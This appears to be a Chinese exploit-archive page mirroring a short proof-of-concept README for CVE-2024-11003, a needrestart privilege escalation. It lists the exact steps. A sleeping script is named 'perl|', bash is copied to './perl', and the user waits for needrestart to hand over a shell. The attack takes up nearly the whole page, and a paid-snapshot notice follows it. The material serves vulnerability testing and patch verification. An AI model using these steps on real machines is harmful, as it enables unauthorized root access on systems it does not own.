关联漏洞
描述
CVE-2024-11003 Perl Poc
介绍
# CVE-2024-11003
## Steps to Exploit
### 1. Create a Perl script
Create a file named `perl|` and add the following code:
```perl
#!/usr/bin/perl
sleep(3600)
```
### 2. Make the file executable
Use the following command to make the file executable:
```bash
chmod +x perl\|
```
### 3. Run the script
Execute the script:
```bash
./perl\|
```
### 4. Copy `/bin/bash` to the same directory
Copy the `bash` binary to the same directory and rename it as `perl`:
```bash
cp /bin/bash perl
```
### 5. Wait for needrestart
Once needrestart starts, you will get a shell.
文件快照
[4.0K] /data/pocs/6c49ace2e321795edc2aa49da8abce85c866091c
└── [ 571] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。